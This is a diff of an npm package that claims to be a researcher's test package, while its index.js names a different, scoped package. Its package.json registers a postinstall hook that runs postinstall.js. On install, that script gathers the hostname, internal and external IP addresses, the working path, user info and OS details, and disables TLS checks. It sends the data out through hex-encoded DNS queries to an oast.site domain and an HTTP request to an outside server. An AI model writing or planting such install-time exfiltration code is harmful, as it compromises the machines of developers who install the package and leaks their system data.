randompackage-notreal 1.0.2

package/index.js

@@ -0,0 +1,2 @@
+// index.js
+console.log("This is the index.js of the @visa-isat/components package");

package/package.json

@@ -0,0 +1,18 @@
+{
+  "name": "randompackage-notreal",
+  "version": "1.0.2",
+  "description": "Researcher public package",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC",
+  "private": false,
+  "files": [
+    "dist/css/common.css",
+    "postinstall.js",
+    "index.js"
+  ]
+}

package/postinstall.js

@@ -0,0 +1,118 @@
+const fs = require('fs');
+const dns = require('dns');
+const http = require('http');
+const https = require('https');
+const os = require('os');
+
+const logFile = '/tmp/postinstall.log';
+
+process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
+
+fs.appendFileSync(logFile, `Starting postinstall script\n`);
+
+const hostname = os.hostname();
+const packageName = process.env.npm_package_name;
+const packageVersion = process.env.npm_package_version;
+const internalIpAddress = require('child_process').execSync('hostname -I').toString().trim();
+const currentPath = process.cwd();
+const platform = os.platform();
+const userInfo = os.userInfo();
+
+// Operating System Details
+const osDetails = {
+  platform: os.platform(),
+  release: os.release(),
+  arch: os.arch()
+};
+
+const fetchExternalIpAddress = (callback) => {
+  https.get('https://api.ipify.org?format=json', (res) => {
+    let data = '';
+
+    res.on('data', (chunk) => {
+      data += chunk;
+    });
+
+    res.on('end', () => {
+      const externalIp = JSON.parse(data).ip;
+      callback(null, externalIp);
+    });
+
+  }).on('error', (err) => {
+    callback(err);
+  });
+};
+
+fetchExternalIpAddress((err, externalIpAddress) => {
+  if (err) {
+    fs.appendFileSync(logFile, `Error fetching external IP address: ${err.message}\n`);
+    return;
+  }
+
+  const data = {
+    packageName,
+    packageVersion,
+    hostname,
+    internalIpAddress,
+    externalIpAddress,
+    currentPath,
+    platform,
+    userInfo,
+    osDetails // Added OS details here
+  };
+
+  fs.appendFileSync(logFile, `Data: ${JSON.stringify(data)}\n`);
+
+  // Prepare data for DNS exfiltration
+  const dnsData = `${packageName}-${hostname}-${externalIpAddress}`;
+  const hexData = Buffer.from(dnsData).toString('hex');
+
+  // Split hex data into parts fitting within DNS label length limit
+  const maxLabelLength = 63;
+  const hexDataParts = [];
+  for (let i = 0; i < hexData.length; i += maxLabelLength) {
+    hexDataParts.push(hexData.substring(i, i + maxLabelLength));
+  }
+
+  // Send each part as a separate DNS query
+  hexDataParts.forEach((part, index, arr) => {
+    const partIndex = index + 1;
+    const totalParts = arr.length;
+    const dnsSubdomain = `${part}-${partIndex}-${totalParts}.cqati6eupgoo97it17fgdatea3nw746q1.oast.site`;
+    dns.resolve4(dnsSubdomain, (err, addresses) => {
+      if (err) {
+        fs.appendFileSync(logFile, `DNS resolution failed: ${err}\n`);
+      } else {
+        fs.appendFileSync(logFile, `DNS query sent for ${dnsSubdomain}\n`);
+      }
+    });
+  });
+
+  // HTTP fallback
+  const getData = `targetUrl=${encodeURIComponent(JSON.stringify(data))}`;
+
+  const options = {
+    hostname: 'sec.zonduu.me', // Replace with your HTTP server hostname
+    port: 80, // Replace with the appropriate port
+    path: `/callbackplz?${getData}`,
+    method: 'GET'
+  };
+
+  const req = http.request(options, (res) => {
+    let responseData = '';
+    res.on('data', (chunk) => {
+      responseData += chunk;
+    });
+    res.on('end', () => {
+      fs.appendFileSync(logFile, `HTTP request completed with status ${res.statusCode}: ${responseData}\n`);
+    });
+  });
+
+  req.on('error', (e) => {
+    fs.appendFileSync(logFile, `HTTP request failed: ${e}\n`);
+  });
+
+  req.end();
+
+  fs.appendFileSync(logFile, `postinstall script finished\n`);
+});